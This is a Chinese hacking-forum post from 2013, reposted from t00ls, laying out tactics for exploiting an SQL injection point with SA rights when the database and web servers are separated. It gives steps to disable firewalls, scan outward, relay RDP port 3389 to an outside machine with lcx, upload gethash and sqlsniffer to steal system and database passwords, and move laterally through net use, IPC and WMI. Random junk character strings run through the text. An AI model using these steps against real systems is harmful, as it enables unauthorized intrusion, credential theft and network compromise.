当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。, \# V4 N1 E, k$ g" k, i* {
% E: d; H0 I* U+ O& g
$ F; l2 M+ {6 ^3 q
( Z! l+ F7 V9 k. k: w) x7 cSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)1 p: S- V ~/ a; s5 c. t
" I' M2 o* u2 w8 M# B9 H
% {$ D/ `5 R+ Y3 u2 w0 ]一、DB机有公网IP.; w3 @* Y" y' p
: I, U) T# a2 @- a# X1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.3 X/ ]: x. c' F4 N: w. ?5 i# D
, P6 Y9 a5 S1 l/ j
; U [# f7 U# Q: P
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.6 n' E% H. y" ]$ A; y" v/ o
7 \4 j$ M9 X/ L3 `! d
& F" ~3 T8 [# h5 l+ z6 x; L& d3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
& M% H. h. T. [& q/ H6 _7 @, K5 }
7 U# Y% [( I/ Y1 G9 R4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.( ?" L W- Q7 I M |
" C4 {) d' e/ u- t* d; j
$ l9 X' N' N* @( s) r
9 v4 y1 c5 ^8 v7 x( ]; W二、DB机只有内网IP8 A0 X2 G( X" D7 k" g4 ? {! d( g
- L' k7 c8 Y+ {# J/ ^1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. j- v& J5 c9 ^% D
/ a' Z8 X T) E) `: G7 Y D
. w4 ^" W0 A. E+ }2:停掉防火墙和IP策略再从内往外扫描.
7 x$ e) }4 }; { Y z) A
3 w" t X. m8 W7 x. A& B" Z* @" ^- c, z! c5 m+ ?! v
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
2 Z, ~4 m3 q6 P0 }- X
" ?! \/ C g0 c
1 h3 a. \4 d4 E; Q8 O4:学会密码规律分析往往会有惊喜.
0 o! d& g) x. U4 N
3 S+ o7 l+ A2 t
$ @) p- Q2 P3 U& t E: }7 }0 c5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
0 S& n7 U. @8 x+ y$ [( {1 i5 k, A5 k* y* L2 X; s0 x7 f& K# g
2 D5 x# v! R7 u# `8 a, Q7 ^
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对